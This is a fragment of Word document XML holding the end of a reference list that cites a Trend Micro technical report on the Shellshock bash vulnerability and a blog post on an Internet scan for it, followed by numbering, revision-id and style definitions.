        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:color w:val="323232"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.newsfactor.com/story.xhtml?story_id=00100018PJ6Y</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">13. Trend Micro Incorporated. (2014). </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>TrendLabs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Shellshock: A Technical Report.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>Last</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>accessed</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> September 27, 2014. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId27" w:history="1">
        <w:r w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:color w:val="323232"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-shellshock.pdf</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00235523">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">14. Robert Graham. (24 September 2014). </w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Bash 'shellshock' scan of the Internet</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:rFonts w:hAnsi="Helvetica"/>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRPr="00295AD1" w:rsidRDefault="005031FD">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId28" w:history="1">
        <w:proofErr w:type="gramStart"/>
        <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink1"/>
            <w:color w:val="323232"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <w:t>erratasec.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Retrieved 3 December 2014.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00235523" w:rsidRPr="00295AD1">
        <w:rPr>
          <w:color w:val="323232"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html#.VHJWmosjifR</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F636E9" w:rsidRDefault="00F636E9">
      <w:pPr>
        <w:pStyle w:val="Default"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00F636E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1FD" w:rsidRDefault="005031FD">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005031FD" w:rsidRDefault="00503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1FD" w:rsidRDefault="005031FD">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="005031FD" w:rsidRDefault="005031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7B1C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="530A2070"/>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114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="0925719F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5308ED96"/>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2">
    <w:nsid w:val="277160EC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="294E0170"/>
    <w:styleLink w:val="Numbered"/>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3."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:position w:val="0"/>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:position w:val="0"/>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:position w:val="0"/>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:position w:val="0"/>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:position w:val="0"/>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:position w:val="0"/>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:position w:val="0"/>
        <w:rtl w:val="0"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="6A2E424A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F9462F0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>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4">
    <w:nsid w:val="75E11B4E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4DA4EB72"/>
    <w:styleLink w:val="List0"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="393"/>
        </w:tabs>
        <w:ind w:left="393" w:hanging="393"/>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="114"/>
        </w:tabs>
      </w:pPr>
      <w:rPr>
        <w:position w:val="0"/>
        <w:sz w:val="24"/>
        <w:szCs w:val="24"/>
        <w:rtl w:val="0"/>
        <w:lang w:val="en-US"/>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6E9"/>
    <w:rsid w:val="00002872"/>
    <w:rsid w:val="00060599"/>
    <w:rsid w:val="0008565B"/>
    <w:rsid w:val="0009140A"/>
    <w:rsid w:val="00095ECC"/>
    <w:rsid w:val="000C332D"/>
    <w:rsid w:val="000F104A"/>
    <w:rsid w:val="00106215"/>
    <w:rsid w:val="00134E84"/>
    <w:rsid w:val="00152D15"/>
    <w:rsid w:val="00154171"/>
    <w:rsid w:val="001D3362"/>
    <w:rsid w:val="001D4158"/>
    <w:rsid w:val="001D7327"/>
    <w:rsid w:val="001E0686"/>
    <w:rsid w:val="001E104C"/>
    <w:rsid w:val="001E1865"/>
    <w:rsid w:val="002030FA"/>
    <w:rsid w:val="0021057A"/>
    <w:rsid w:val="00235523"/>
    <w:rsid w:val="002372FD"/>
    <w:rsid w:val="002605A5"/>
    <w:rsid w:val="0027586A"/>
    <w:rsid w:val="0028116D"/>
    <w:rsid w:val="00286903"/>
    <w:rsid w:val="00295AD1"/>
    <w:rsid w:val="002B277C"/>
    <w:rsid w:val="002C234D"/>
    <w:rsid w:val="002C3E2E"/>
    <w:rsid w:val="002D5C9F"/>
    <w:rsid w:val="002E552A"/>
    <w:rsid w:val="00316A35"/>
    <w:rsid w:val="0035401C"/>
    <w:rsid w:val="00386CE6"/>
    <w:rsid w:val="00391B56"/>
    <w:rsid w:val="00392B1D"/>
    <w:rsid w:val="003A4CFB"/>
    <w:rsid w:val="003B7568"/>
    <w:rsid w:val="003E2B42"/>
    <w:rsid w:val="00410386"/>
    <w:rsid w:val="00432201"/>
    <w:rsid w:val="00434EBB"/>
    <w:rsid w:val="0047483F"/>
    <w:rsid w:val="00475A87"/>
    <w:rsid w:val="004B4AF6"/>
    <w:rsid w:val="004B58F7"/>
    <w:rsid w:val="004C4C3B"/>
    <w:rsid w:val="004E3EAA"/>
    <w:rsid w:val="004F2927"/>
    <w:rsid w:val="004F7A5A"/>
    <w:rsid w:val="00501B12"/>
    <w:rsid w:val="005031FD"/>
    <w:rsid w:val="005063E2"/>
    <w:rsid w:val="00506527"/>
    <w:rsid w:val="00526DF6"/>
    <w:rsid w:val="0052782B"/>
    <w:rsid w:val="005325A9"/>
    <w:rsid w:val="005337BF"/>
    <w:rsid w:val="005609FD"/>
    <w:rsid w:val="00562273"/>
    <w:rsid w:val="00581ADF"/>
    <w:rsid w:val="00582B99"/>
    <w:rsid w:val="0058322E"/>
    <w:rsid w:val="005C27AD"/>
    <w:rsid w:val="005D2E31"/>
    <w:rsid w:val="005D7F44"/>
    <w:rsid w:val="005E53F4"/>
    <w:rsid w:val="005E78FF"/>
    <w:rsid w:val="00603671"/>
    <w:rsid w:val="00666194"/>
    <w:rsid w:val="00695D04"/>
    <w:rsid w:val="006A6F2F"/>
    <w:rsid w:val="006A7F0B"/>
    <w:rsid w:val="006D0091"/>
    <w:rsid w:val="006F6EDB"/>
    <w:rsid w:val="00703AA9"/>
    <w:rsid w:val="007270CE"/>
    <w:rsid w:val="00742FF2"/>
    <w:rsid w:val="007B38C7"/>
    <w:rsid w:val="007C7E19"/>
    <w:rsid w:val="007E4BBC"/>
    <w:rsid w:val="007F3D55"/>
    <w:rsid w:val="00812ABC"/>
    <w:rsid w:val="00814212"/>
    <w:rsid w:val="00834E80"/>
    <w:rsid w:val="0084414B"/>
    <w:rsid w:val="0087582B"/>
    <w:rsid w:val="0088277B"/>
    <w:rsid w:val="008D31EF"/>
    <w:rsid w:val="008E193C"/>
    <w:rsid w:val="008E21C5"/>
    <w:rsid w:val="00903566"/>
    <w:rsid w:val="009473CB"/>
    <w:rsid w:val="00970CF0"/>
    <w:rsid w:val="009766C3"/>
    <w:rsid w:val="0097780B"/>
    <w:rsid w:val="009A478B"/>
    <w:rsid w:val="009A546F"/>
    <w:rsid w:val="009B7846"/>
    <w:rsid w:val="009C0B95"/>
    <w:rsid w:val="009C1500"/>
    <w:rsid w:val="009E0441"/>
    <w:rsid w:val="009E0738"/>
    <w:rsid w:val="00A33407"/>
    <w:rsid w:val="00A54AFD"/>
    <w:rsid w:val="00A745C0"/>
    <w:rsid w:val="00AD094F"/>
    <w:rsid w:val="00AD4D59"/>
    <w:rsid w:val="00AD6A5C"/>
    <w:rsid w:val="00B25E68"/>
    <w:rsid w:val="00B66455"/>
    <w:rsid w:val="00B900B5"/>
    <w:rsid w:val="00B96A20"/>
    <w:rsid w:val="00BF2DE4"/>
    <w:rsid w:val="00C04768"/>
    <w:rsid w:val="00C129DD"/>
    <w:rsid w:val="00C2522D"/>
    <w:rsid w:val="00C83E8C"/>
    <w:rsid w:val="00C8773B"/>
    <w:rsid w:val="00C91D00"/>
    <w:rsid w:val="00C970D6"/>
    <w:rsid w:val="00CB62B1"/>
    <w:rsid w:val="00CD4F7C"/>
    <w:rsid w:val="00CE02BF"/>
    <w:rsid w:val="00CE7E7C"/>
    <w:rsid w:val="00D34ED2"/>
    <w:rsid w:val="00D41A9C"/>
    <w:rsid w:val="00D7198E"/>
    <w:rsid w:val="00D818C7"/>
    <w:rsid w:val="00D91658"/>
    <w:rsid w:val="00DB4ED0"/>
    <w:rsid w:val="00DD13EA"/>
    <w:rsid w:val="00DD3BC1"/>
    <w:rsid w:val="00DF0418"/>
    <w:rsid w:val="00E075E2"/>
    <w:rsid w:val="00E101CF"/>
    <w:rsid w:val="00E46243"/>
    <w:rsid w:val="00E67088"/>
    <w:rsid w:val="00E92DD4"/>
    <w:rsid w:val="00EB2815"/>
    <w:rsid w:val="00ED0D12"/>
    <w:rsid w:val="00ED5611"/>
    <w:rsid w:val="00EE4F16"/>
    <w:rsid w:val="00EE653C"/>
    <w:rsid w:val="00EF5C21"/>
    <w:rsid w:val="00F242CC"/>
    <w:rsid w:val="00F33D03"/>
    <w:rsid w:val="00F41CC1"/>
    <w:rsid w:val="00F50876"/>
    <w:rsid w:val="00F636E9"/>
    <w:rsid w:val="00F908E3"/>
    <w:rsid w:val="00FA3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Title">
    <w:name w:val="Title"/>
    <w:next w:val="Body2"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Body2">
    <w:name w:val="Body 2"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
      <w:ind w:firstLine="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode MS" w:hAnsi="Arial Unicode MS" w:cs="Arial Unicode MS"/>
      <w:color w:val="000000"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="BodyA">
    <w:name w:val="Body A"/>
    <w:pPr>
      <w:spacing w:before="160" w:line="288" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Helvetica" w:eastAsia="Arial Unicode M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None">
    <w:name w:val="None"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Hyperlink0">
    <w:name w:val="Hyperlink.0"/>
    <w:basedOn w:val="None"/>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:u w:val="single"/>
      <w:lang w:val="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="Body">
    <w:name w:val="Body"/>
    <w:pPr>
      <w:spacing w:line="480" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
